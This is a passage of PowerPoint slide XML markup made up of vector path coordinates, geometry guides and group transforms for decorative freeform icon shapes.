                      <a:pt x="0" y="402"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="402"/>
                      <a:pt x="42" y="426"/>
                      <a:pt x="83" y="406"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="465"/>
                      <a:pt x="83" y="558"/>
                      <a:pt x="83" y="558"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="564"/>
                      <a:pt x="83" y="564"/>
                      <a:pt x="83" y="564"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="369" y="564"/>
                      <a:pt x="369" y="564"/>
                      <a:pt x="369" y="564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52"/>
                      <a:pt x="369" y="552"/>
                      <a:pt x="369" y="552"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="369" y="530"/>
                      <a:pt x="369" y="456"/>
                      <a:pt x="369" y="406"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="410" y="426"/>
                      <a:pt x="452" y="402"/>
                      <a:pt x="452" y="402"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="265" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="281" y="69"/>
                      <a:pt x="293" y="82"/>
                      <a:pt x="293" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="293" y="113"/>
                      <a:pt x="281" y="126"/>
                      <a:pt x="265" y="126"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="249" y="126"/>
                      <a:pt x="237" y="113"/>
                      <a:pt x="237" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="237" y="82"/>
                      <a:pt x="249" y="69"/>
                      <a:pt x="265" y="69"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="226" y="135"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="293" y="181"/>
                      <a:pt x="293" y="181"/>
                      <a:pt x="293" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="226" y="228"/>
                      <a:pt x="226" y="228"/>
                      <a:pt x="226" y="228"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="181"/>
                      <a:pt x="159" y="181"/>
                      <a:pt x="159" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="224" y="137"/>
                      <a:pt x="224" y="137"/>
                      <a:pt x="224" y="137"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="226" y="135"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="187" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="203" y="69"/>
                      <a:pt x="216" y="82"/>
                      <a:pt x="216" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="216" y="113"/>
                      <a:pt x="203" y="126"/>
                      <a:pt x="187" y="126"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="171" y="126"/>
                      <a:pt x="159" y="113"/>
                      <a:pt x="159" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="82"/>
                      <a:pt x="171" y="69"/>
                      <a:pt x="187" y="69"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="116" y="552"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="543"/>
                      <a:pt x="129" y="527"/>
                      <a:pt x="159" y="527"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="188" y="527"/>
                      <a:pt x="198" y="543"/>
                      <a:pt x="202" y="552"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="190" y="552"/>
                      <a:pt x="128" y="552"/>
                      <a:pt x="116" y="552"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="214" y="552"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="211" y="540"/>
                      <a:pt x="199" y="515"/>
                      <a:pt x="159" y="515"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="147" y="515"/>
                      <a:pt x="138" y="517"/>
                      <a:pt x="131" y="520"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="478"/>
                      <a:pt x="132" y="411"/>
                      <a:pt x="133" y="381"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="135" y="328"/>
                      <a:pt x="155" y="267"/>
                      <a:pt x="229" y="267"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="303" y="267"/>
                      <a:pt x="318" y="328"/>
                      <a:pt x="321" y="386"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="322" y="410"/>
                      <a:pt x="322" y="480"/>
                      <a:pt x="322" y="523"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="314" y="518"/>
                      <a:pt x="303" y="515"/>
                      <a:pt x="289" y="515"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="249" y="515"/>
                      <a:pt x="237" y="540"/>
                      <a:pt x="233" y="552"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="214" y="552"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="246" y="552"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="249" y="543"/>
                      <a:pt x="259" y="527"/>
                      <a:pt x="289" y="527"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="318" y="527"/>
                      <a:pt x="328" y="543"/>
                      <a:pt x="332" y="552"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="320" y="552"/>
                      <a:pt x="258" y="552"/>
                      <a:pt x="246" y="55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62C7989B-EEE1-4E06-BA9A-9A2E20CD16AA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="19675956">
              <a:off x="7990249" y="2420029"/>
              <a:ext cx="374558" cy="1069622"/>
              <a:chOff x="9469654" y="2159644"/>
              <a:chExt cx="752475" cy="2148831"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="141" name="Freeform 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15A00C1E-E903-415C-9709-8816F3F773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2" name="Freeform 14">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD373E54-6304-4D84-9612-E36BC36324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3" name="任意多边形 139">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E58A6D9-D83B-42A3-A219-2E94F60958D0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7BEF9CED-635C-4C72-872B-719F63536539}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="19599641">
              <a:off x="8622723" y="3034862"/>
              <a:ext cx="1240338" cy="634328"/>
              <a:chOff x="10078074" y="1730681"/>
              <a:chExt cx="695325" cy="355600"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="139" name="Oval 53">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BDA8F5F-AC5C-432B-A72D-36E82D752007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078074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0" name="Freeform 54">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{768ACBC7-0FC2-4A40-BF68-268F84B7D3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48ECF8-250E-41D9-850E-D2416977D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136281" flipH="1" flipV="1">
              <a:off x="4057595" y="4214936"/>
              <a:ext cx="676275" cy="749300"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 96 w 180"/>
                <a:gd name="T1" fmla="*/ 21 h 199"/>
                <a:gd name="T2" fmla="*/ 104 w 180"/>
                <a:gd name="T3" fmla="*/ 88 h 199"/>
                <a:gd name="T4" fmla="*/ 116 w 180"/>
                <a:gd name="T5" fmla="*/ 33 h 199"/>
                <a:gd name="T6" fmla="*/ 127 w 180"/>
                <a:gd name="T7" fmla="*/ 26 h 199"/>
                <a:gd name="T8" fmla="*/ 126 w 180"/>
                <a:gd name="T9" fmla="*/ 87 h 199"/>
                <a:gd name="T10" fmla="*/ 126 w 180"/>
                <a:gd name="T11" fmla="*/ 87 h 199"/>
                <a:gd name="T12" fmla="*/ 129 w 180"/>
                <a:gd name="T13" fmla="*/ 94 h 199"/>
                <a:gd name="T14" fmla="*/ 132 w 180"/>
                <a:gd name="T15" fmla="*/ 91 h 199"/>
                <a:gd name="T16" fmla="*/ 155 w 180"/>
                <a:gd name="T17" fmla="*/ 54 h 199"/>
                <a:gd name="T18" fmla="*/ 163 w 180"/>
                <a:gd name="T19" fmla="*/ 69 h 199"/>
                <a:gd name="T20" fmla="*/ 120 w 180"/>
                <a:gd name="T21" fmla="*/ 170 h 199"/>
                <a:gd name="T22" fmla="*/ 68 w 180"/>
                <a:gd name="T23" fmla="*/ 187 h 199"/>
                <a:gd name="T24" fmla="*/ 47 w 180"/>
                <a:gd name="T25" fmla="*/ 147 h 199"/>
                <a:gd name="T26" fmla="*/ 15 w 180"/>
                <a:gd name="T27" fmla="*/ 107 h 199"/>
                <a:gd name="T28" fmla="*/ 28 w 180"/>
                <a:gd name="T29" fmla="*/ 106 h 199"/>
                <a:gd name="T30" fmla="*/ 52 w 180"/>
                <a:gd name="T31" fmla="*/ 122 h 199"/>
                <a:gd name="T32" fmla="*/ 39 w 180"/>
                <a:gd name="T33" fmla="*/ 42 h 199"/>
                <a:gd name="T34" fmla="*/ 48 w 180"/>
                <a:gd name="T35" fmla="*/ 29 h 199"/>
                <a:gd name="T36" fmla="*/ 72 w 180"/>
                <a:gd name="T37" fmla="*/ 85 h 199"/>
                <a:gd name="T38" fmla="*/ 79 w 180"/>
                <a:gd name="T39" fmla="*/ 94 h 199"/>
                <a:gd name="T40" fmla="*/ 77 w 180"/>
                <a:gd name="T41" fmla="*/ 23 h 199"/>
                <a:gd name="T42" fmla="*/ 86 w 180"/>
                <a:gd name="T43" fmla="*/ 13 h 199"/>
                <a:gd name="T44" fmla="*/ 85 w 180"/>
                <a:gd name="T45" fmla="*/ 0 h 199"/>
                <a:gd name="T46" fmla="*/ 65 w 180"/>
                <a:gd name="T47" fmla="*/ 24 h 199"/>
                <a:gd name="T48" fmla="*/ 42 w 180"/>
                <a:gd name="T49" fmla="*/ 18 h 199"/>
                <a:gd name="T50" fmla="*/ 28 w 180"/>
                <a:gd name="T51" fmla="*/ 45 h 199"/>
                <a:gd name="T52" fmla="*/ 45 w 180"/>
                <a:gd name="T53" fmla="*/ 103 h 199"/>
                <a:gd name="T54" fmla="*/ 22 w 180"/>
                <a:gd name="T55" fmla="*/ 91 h 199"/>
                <a:gd name="T56" fmla="*/ 5 w 180"/>
                <a:gd name="T57" fmla="*/ 99 h 199"/>
                <a:gd name="T58" fmla="*/ 8 w 180"/>
                <a:gd name="T59" fmla="*/ 129 h 199"/>
                <a:gd name="T60" fmla="*/ 55 w 180"/>
                <a:gd name="T61" fmla="*/ 175 h 199"/>
                <a:gd name="T62" fmla="*/ 56 w 180"/>
                <a:gd name="T63" fmla="*/ 199 h 199"/>
                <a:gd name="T64" fmla="*/ 119 w 180"/>
                <a:gd name="T65" fmla="*/ 199 h 199"/>
                <a:gd name="T66" fmla="*/ 132 w 180"/>
                <a:gd name="T67" fmla="*/ 187 h 199"/>
                <a:gd name="T68" fmla="*/ 148 w 180"/>
                <a:gd name="T69" fmla="*/ 129 h 199"/>
                <a:gd name="T70" fmla="*/ 166 w 180"/>
                <a:gd name="T71" fmla="*/ 45 h 199"/>
                <a:gd name="T72" fmla="*/ 146 w 180"/>
                <a:gd name="T73" fmla="*/ 44 h 199"/>
                <a:gd name="T74" fmla="*/ 129 w 180"/>
                <a:gd name="T75" fmla="*/ 14 h 199"/>
                <a:gd name="T76" fmla="*/ 108 w 180"/>
                <a:gd name="T77" fmla="*/ 22 h 199"/>
                <a:gd name="T78" fmla="*/ 86 w 180"/>
                <a:gd name="T79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0" h="199">
                  <a:moveTo>
                    <a:pt x="86" y="13"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="13"/>
                    <a:pt x="95" y="16"/>
                    <a:pt x="96" y="21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2" y="87"/>
                    <a:pt x="103" y="88"/>
                    <a:pt x="104" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="88"/>
                    <a:pt x="107" y="84"/>
                    <a:pt x="107" y="84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7" y="29"/>
                    <a:pt x="121" y="26"/>
                    <a:pt x="126" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="26"/>
                    <a:pt x="127" y="26"/>
                    <a:pt x="127" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="27"/>
                    <a:pt x="136" y="32"/>
                    <a:pt x="135" y="3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87"/>
                    <a:pt x="126" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="87"/>
                    <a:pt x="126" y="94"/>
                    <a:pt x="129" y="94"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="94"/>
                    <a:pt x="131" y="93"/>
                    <a:pt x="132" y="91"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="91"/>
                    <a:pt x="132" y="91"/>
                    <a:pt x="132" y="91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9" y="56"/>
                    <a:pt x="152" y="54"/>
                    <a:pt x="155" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="54"/>
                    <a:pt x="158" y="55"/>
                    <a:pt x="160" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="58"/>
                    <a:pt x="166" y="64"/>
                    <a:pt x="163" y="69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5"/>
                    <a:pt x="130" y="150"/>
                    <a:pt x="120" y="170"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="187"/>
                    <a:pt x="119" y="187"/>
                    <a:pt x="11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69"/>
                    <a:pt x="56" y="163"/>
                    <a:pt x="47" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="120"/>
                    <a:pt x="16" y="120"/>
                    <a:pt x="16" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="117"/>
                    <a:pt x="11" y="111"/>
                    <a:pt x="15" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="105"/>
                    <a:pt x="19" y="103"/>
                    <a:pt x="22" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="103"/>
                    <a:pt x="26" y="104"/>
                    <a:pt x="28" y="106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1"/>
                    <a:pt x="50" y="122"/>
                    <a:pt x="52" y="122"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="122"/>
                    <a:pt x="62" y="115"/>
                    <a:pt x="55" y="9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37"/>
                    <a:pt x="41" y="31"/>
                    <a:pt x="46" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="29"/>
                    <a:pt x="48" y="29"/>
                    <a:pt x="48" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="29"/>
                    <a:pt x="56" y="32"/>
                    <a:pt x="57" y="36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3" y="85"/>
                    <a:pt x="73" y="85"/>
                    <a:pt x="73" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="89"/>
                    <a:pt x="77" y="94"/>
                    <a:pt x="79" y="94"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="94"/>
                    <a:pt x="82" y="91"/>
                    <a:pt x="82" y="8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18"/>
                    <a:pt x="80" y="13"/>
                    <a:pt x="86" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="13"/>
                    <a:pt x="86" y="13"/>
                    <a:pt x="86" y="13"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="86" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="0"/>
                    <a:pt x="85" y="0"/>
                    <a:pt x="85" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="1"/>
                    <a:pt x="64" y="12"/>
                    <a:pt x="65" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="24"/>
                    <a:pt x="65" y="24"/>
                    <a:pt x="65" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="20"/>
                    <a:pt x="55" y="17"/>
                    <a:pt x="48" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="17"/>
                    <a:pt x="44" y="17"/>
                    <a:pt x="42" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="20"/>
                    <a:pt x="32" y="23"/>
                    <a:pt x="29" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="34"/>
                    <a:pt x="26" y="40"/>
                    <a:pt x="28" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="94"/>
                    <a:pt x="43" y="94"/>
                    <a:pt x="43" y="94"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="98"/>
                    <a:pt x="45" y="101"/>
                    <a:pt x="45" y="103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2" y="93"/>
                    <a:pt x="27" y="91"/>
                    <a:pt x="22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16" y="91"/>
                    <a:pt x="10" y="94"/>
                    <a:pt x="5" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="103"/>
                    <a:pt x="0" y="109"/>
                    <a:pt x="0" y="115"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="120"/>
                    <a:pt x="4" y="126"/>
                    <a:pt x="8" y="129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44" y="165"/>
                    <a:pt x="51" y="171"/>
                    <a:pt x="55" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="187"/>
                    <a:pt x="56" y="187"/>
                    <a:pt x="56" y="187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32" y="199"/>
                    <a:pt x="132" y="199"/>
                    <a:pt x="132" y="19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2" y="173"/>
                    <a:pt x="132" y="173"/>
                    <a:pt x="132" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="141" y="155"/>
                    <a:pt x="147" y="135"/>
                    <a:pt x="148" y="12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80" y="64"/>
                    <a:pt x="176" y="51"/>
                    <a:pt x="166" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="43"/>
                    <a:pt x="159" y="42"/>
                    <a:pt x="155" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="42"/>
                    <a:pt x="149" y="42"/>
                    <a:pt x="146" y="44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9" y="27"/>
                    <a:pt x="141" y="16"/>
                    <a:pt x="129" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="13"/>
                    <a:pt x="127" y="13"/>
                    <a:pt x="126" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="13"/>
                    <a:pt x="112" y="17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7" y="9"/>
                    <a:pt x="98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061BA117-F356-4CB2-84FB-8185C4BB3E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7348708" y="5932775"/>
              <a:ext cx="736600" cy="738188"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 195 w 196"/>
                <a:gd name="T1" fmla="*/ 194 h 196"/>
                <a:gd name="T2" fmla="*/ 190 w 196"/>
                <a:gd name="T3" fmla="*/ 196 h 196"/>
                <a:gd name="T4" fmla="*/ 118 w 196"/>
                <a:gd name="T5" fmla="*/ 196 h 196"/>
                <a:gd name="T6" fmla="*/ 113 w 196"/>
                <a:gd name="T7" fmla="*/ 194 h 196"/>
                <a:gd name="T8" fmla="*/ 112 w 196"/>
                <a:gd name="T9" fmla="*/ 192 h 196"/>
                <a:gd name="T10" fmla="*/ 113 w 196"/>
                <a:gd name="T11" fmla="*/ 185 h 196"/>
                <a:gd name="T12" fmla="*/ 135 w 196"/>
                <a:gd name="T13" fmla="*/ 169 h 196"/>
                <a:gd name="T14" fmla="*/ 103 w 196"/>
                <a:gd name="T15" fmla="*/ 136 h 196"/>
                <a:gd name="T16" fmla="*/ 103 w 196"/>
                <a:gd name="T17" fmla="*/ 136 h 196"/>
                <a:gd name="T18" fmla="*/ 103 w 196"/>
                <a:gd name="T19" fmla="*/ 136 h 196"/>
                <a:gd name="T20" fmla="*/ 103 w 196"/>
                <a:gd name="T21" fmla="*/ 102 h 196"/>
                <a:gd name="T22" fmla="*/ 136 w 196"/>
                <a:gd name="T23" fmla="*/ 102 h 196"/>
                <a:gd name="T24" fmla="*/ 137 w 196"/>
                <a:gd name="T25" fmla="*/ 103 h 196"/>
                <a:gd name="T26" fmla="*/ 137 w 196"/>
                <a:gd name="T27" fmla="*/ 103 h 196"/>
                <a:gd name="T28" fmla="*/ 169 w 196"/>
                <a:gd name="T29" fmla="*/ 135 h 196"/>
                <a:gd name="T30" fmla="*/ 186 w 196"/>
                <a:gd name="T31" fmla="*/ 113 h 196"/>
                <a:gd name="T32" fmla="*/ 192 w 196"/>
                <a:gd name="T33" fmla="*/ 112 h 196"/>
                <a:gd name="T34" fmla="*/ 196 w 196"/>
                <a:gd name="T35" fmla="*/ 118 h 196"/>
                <a:gd name="T36" fmla="*/ 196 w 196"/>
                <a:gd name="T37" fmla="*/ 190 h 196"/>
                <a:gd name="T38" fmla="*/ 195 w 196"/>
                <a:gd name="T39" fmla="*/ 194 h 196"/>
                <a:gd name="T40" fmla="*/ 60 w 196"/>
                <a:gd name="T41" fmla="*/ 94 h 196"/>
                <a:gd name="T42" fmla="*/ 59 w 196"/>
                <a:gd name="T43" fmla="*/ 94 h 196"/>
                <a:gd name="T44" fmla="*/ 59 w 196"/>
                <a:gd name="T45" fmla="*/ 94 h 196"/>
                <a:gd name="T46" fmla="*/ 27 w 196"/>
                <a:gd name="T47" fmla="*/ 61 h 196"/>
                <a:gd name="T48" fmla="*/ 10 w 196"/>
                <a:gd name="T49" fmla="*/ 83 h 196"/>
                <a:gd name="T50" fmla="*/ 3 w 196"/>
                <a:gd name="T51" fmla="*/ 85 h 196"/>
                <a:gd name="T52" fmla="*/ 0 w 196"/>
                <a:gd name="T53" fmla="*/ 79 h 196"/>
                <a:gd name="T54" fmla="*/ 0 w 196"/>
                <a:gd name="T55" fmla="*/ 7 h 196"/>
                <a:gd name="T56" fmla="*/ 1 w 196"/>
                <a:gd name="T57" fmla="*/ 2 h 196"/>
                <a:gd name="T58" fmla="*/ 6 w 196"/>
                <a:gd name="T59" fmla="*/ 0 h 196"/>
                <a:gd name="T60" fmla="*/ 78 w 196"/>
                <a:gd name="T61" fmla="*/ 0 h 196"/>
                <a:gd name="T62" fmla="*/ 82 w 196"/>
                <a:gd name="T63" fmla="*/ 2 h 196"/>
                <a:gd name="T64" fmla="*/ 84 w 196"/>
                <a:gd name="T65" fmla="*/ 4 h 196"/>
                <a:gd name="T66" fmla="*/ 82 w 196"/>
                <a:gd name="T67" fmla="*/ 11 h 196"/>
                <a:gd name="T68" fmla="*/ 58 w 196"/>
                <a:gd name="T69" fmla="*/ 27 h 196"/>
                <a:gd name="T70" fmla="*/ 93 w 196"/>
                <a:gd name="T71" fmla="*/ 60 h 196"/>
                <a:gd name="T72" fmla="*/ 93 w 196"/>
                <a:gd name="T73" fmla="*/ 60 h 196"/>
                <a:gd name="T74" fmla="*/ 93 w 196"/>
                <a:gd name="T75" fmla="*/ 60 h 196"/>
                <a:gd name="T76" fmla="*/ 91 w 196"/>
                <a:gd name="T77" fmla="*/ 94 h 196"/>
                <a:gd name="T78" fmla="*/ 60 w 196"/>
                <a:gd name="T79" fmla="*/ 9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6" h="196">
                  <a:moveTo>
                    <a:pt x="195" y="194"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="195"/>
                    <a:pt x="192" y="196"/>
                    <a:pt x="190" y="196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116" y="196"/>
                    <a:pt x="115" y="195"/>
                    <a:pt x="113" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="194"/>
                    <a:pt x="112" y="193"/>
                    <a:pt x="112" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="190"/>
                    <a:pt x="112" y="187"/>
                    <a:pt x="113" y="185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27"/>
                    <a:pt x="93" y="112"/>
                    <a:pt x="103" y="102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="93"/>
                    <a:pt x="127" y="93"/>
                    <a:pt x="136" y="102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="102"/>
                    <a:pt x="137" y="103"/>
                    <a:pt x="137" y="103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86" y="113"/>
                    <a:pt x="186" y="113"/>
                    <a:pt x="186" y="113"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="111"/>
                    <a:pt x="190" y="111"/>
                    <a:pt x="192" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="113"/>
                    <a:pt x="196" y="115"/>
                    <a:pt x="196" y="118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3"/>
                    <a:pt x="195" y="194"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="60" y="94"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="94"/>
                    <a:pt x="59" y="94"/>
                    <a:pt x="59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8" y="85"/>
                    <a:pt x="6" y="86"/>
                    <a:pt x="3" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="84"/>
                    <a:pt x="0" y="81"/>
                    <a:pt x="0" y="7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0" y="0"/>
                    <a:pt x="81" y="1"/>
                    <a:pt x="82" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="3"/>
                    <a:pt x="84" y="3"/>
                    <a:pt x="84" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="6"/>
                    <a:pt x="84" y="9"/>
                    <a:pt x="82" y="11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103" y="70"/>
                    <a:pt x="101" y="85"/>
                    <a:pt x="91" y="94"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="103"/>
                    <a:pt x="69" y="103"/>
                    <a:pt x="60" y="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5" name="Freeform 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{453C6423-EF8B-498E-ADD6-9F2E94D583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348066" flipH="1" flipV="1">
              <a:off x="652486" y="1643390"/>
              <a:ext cx="747712" cy="744538"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 199 w 199"/>
                <a:gd name="T1" fmla="*/ 99 h 198"/>
                <a:gd name="T2" fmla="*/ 100 w 199"/>
                <a:gd name="T3" fmla="*/ 0 h 198"/>
                <a:gd name="T4" fmla="*/ 0 w 199"/>
                <a:gd name="T5" fmla="*/ 99 h 198"/>
                <a:gd name="T6" fmla="*/ 100 w 199"/>
                <a:gd name="T7" fmla="*/ 198 h 198"/>
                <a:gd name="T8" fmla="*/ 199 w 199"/>
                <a:gd name="T9" fmla="*/ 99 h 198"/>
                <a:gd name="T10" fmla="*/ 96 w 199"/>
                <a:gd name="T11" fmla="*/ 120 h 198"/>
                <a:gd name="T12" fmla="*/ 36 w 199"/>
                <a:gd name="T13" fmla="*/ 120 h 198"/>
                <a:gd name="T14" fmla="*/ 36 w 199"/>
                <a:gd name="T15" fmla="*/ 76 h 198"/>
                <a:gd name="T16" fmla="*/ 96 w 199"/>
                <a:gd name="T17" fmla="*/ 76 h 198"/>
                <a:gd name="T18" fmla="*/ 96 w 199"/>
                <a:gd name="T19" fmla="*/ 40 h 198"/>
                <a:gd name="T20" fmla="*/ 172 w 199"/>
                <a:gd name="T21" fmla="*/ 98 h 198"/>
                <a:gd name="T22" fmla="*/ 96 w 199"/>
                <a:gd name="T23" fmla="*/ 157 h 198"/>
